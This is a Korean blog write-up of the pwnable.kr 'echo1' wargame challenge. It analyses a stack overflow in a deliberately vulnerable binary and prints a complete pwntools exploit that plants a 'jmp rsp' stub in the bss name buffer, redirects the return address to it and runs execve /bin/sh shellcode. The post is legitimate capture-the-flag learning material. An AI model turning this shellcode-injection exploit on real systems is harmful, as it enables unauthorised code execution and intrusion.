[Rookiss]echo1

🌇│System_Study/🪙│Pwnable.kr

[Rookiss]echo1

Jastes 2022. 11. 20. 23:10

echo1_WriteUp

보시면.. echo service를 하고 있으며, 해당 다운로드 해서 확인해보라고 알려줍니다.
파일을 받아서 열어보니까.. 실행파일이고 리버싱 할 부분이 너무 많아서 IDA 사용!

참고로 echo는 그냥 return이라고 생각하시면 될 거 같습니다.

참고로 저는 리버싱 늅늅이라서 드럽게 못하거든요 그래서 길어지면.. 흐규 ㅠ

위 코드를 살펴보면 15번 줄에서 이름을 물어보며 저장을 v7에 저장합니다.
그리고 입력을 두 반복문을 통해 echo를 한다고 하는데 막상 실행하거나 아님 func을 보시면
정작 되는건 24번의 BOF echo뿐입니다.

보시면 s는 할당을 0x20만큼했으나 입력은 0x80까지 하는 모습을 보여줍니다.
그러므로 bof가 발생하게 되는거겠죠?

위에 보시면 Partial RELRO 를 제외하고선 보호기법이 전무합니다.
그러므로 ASLR이 걸려있겠죠(이것은 RELRO가 있으면 있다고 보시면 됩니다.)
마지막으로 NX도 안 걸려있으니까 shellcode도 삽입이 가능합니다.

그럼 저희는 bof의 값에 쉘코드를 넣어 실행하면 되겠습니다.
또한 해당 취약점의 핵심은 echo1에서 발생한다는 점!(그니까 문제 제목이 그런가?)

Exploit design(Senario)

bof의 설계는 보안의 기본이니까 넘어가며, 문제는 20byte에 쉘코드를 넣기는 무리이며,
ASLR이 걸려있기에 쉘코드를 넣는다고 해도 주소의 영향이 없는 영역에 삽입을 해야합니다.
그러므로 ASLR(Partial RELRO)의 영향이 없는 .bss영역 등이 존재하겠습니다.

보시면 여기서 bss 영역에 있는 저희가 쓰는 변수라곤.. id(V7)이네요
크기도 작은게 shellcode를 넣기보다는 그 위치를 저장하는 포인터가 적합하겠습니다.

Senario

bof를 발생시킨다
ret값을 id의 값으로 위치를 변조한다
- 해당 위치에는 쉘 코드의 주소값을 받는다

먼저 bss 영역을 확인해봅시다(id)

id의 주소의 위치도 알게되었습니다.
그냥 e.bss해도 될거 같긴한데 저희는 확실하게 id의 주소가 필요하니까
굳이 했다가 오류나는것보다는 이런 경우는 직접 명시가 좋겠죠?

여기서 저는 많은 고민을 했습니다...
어떻게 하면 어느 주소에 shellcode를 넣어야할까.. bof가 발생되나 20byte..
하지만 생각보다 간단한 문제였습니다.bof가 초과시 이후 rsp의 영역에 적재가 되기 때문이죠

위 그림은 이전에 했던 brain fuck의 메모리의 형태이며, 보시면 바로 ebp밑에 다시 esp로
bof가 발생시 dummy값과 offset을 논외로 친다면 바로 esp에 적재되어 메모리에 차지하겠습니다.

그럼 어떻게 이 구간을 구할까.. 이것도 풀어보니까 어렵지 않더라고요(내 삽질..)
바로 jmp rsp 라는 asm의 명령어를 넣어준다면 그 다음 구간으로 넘어갈 것이니까요
그러면 payload의 형식을 대략 설계한다면..

id(4byte; shellcode in address ; bss)
bof(0x20) + sfp(0x8) + ret(id; shellcode address)

그럼 한번 exploit code를 살펴보시면 추가적으로 설명을 들어가겠습니다.

Exploit code

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49 from pwn import *
import sys
 
'''defalut setting'''
context(arch='amd64', os='linux', endian='little')
context.log_level = 'debug'
 
'''connect RCE LPE choose'''
'''
if(args['REMOTE']):
    p = remote('pwnable.kr', sys.argv[1])
else:
    p = process('./echo1')
'''
 
p = remote('pwnable.kr', 9010)
 
'''payload design & excute'''
#why do excuite f**k!
#sleep(2) #server and local connection speed difference
p.recvuntil("hey, what's your name? : ")
p.sendline(asm('jmp rsp'))
#p.sendlineafter('name? : ', asm('jmp rsp'))
#sleep(2)
p.recvuntil('> ')
p.sendline('1')
#p.sendline(str(1))
p.recvuntil('\n')
 
#p.sendlineafter('> ', '1')
 
'''
p.sendline(asm('jmp rsp'))
p.sendline(str(1))
p.recvuntil('\n')
'''
 
'''payload design'''
#payload = b'A'*0x28
payload = b'\x90'*0x28
payload += p64(0x6020a0)
#payload += p64(asm(shellcraft.sh()))
#payload += b'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80'
payload += b'\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05'
 
p.sendline(payload)
p.recvuntil('\n')
 
p.interactive()
Colored by Color Scripter cs

코드의 구성은 앞에서 다 설명했으므로 넘어가겠습니다.
또한 주석으로 어느정도 설명했기에 서술하지는 않겠습니다.

앞부분은 취향차이며 실제론 payload design을 보시면 되겠습니다

하.. pwnable.kr은 다 좋은데 이상하게 서버랑 후.. 안되는게 너무 많네요
이번엔 받는 부분도 안되고 쉘코드를 불러와도 찾은것도 안되는것도 몰라서 쌉질은 쌍

참고 자료

참고 이미지

저작자표시 비영리 변경금지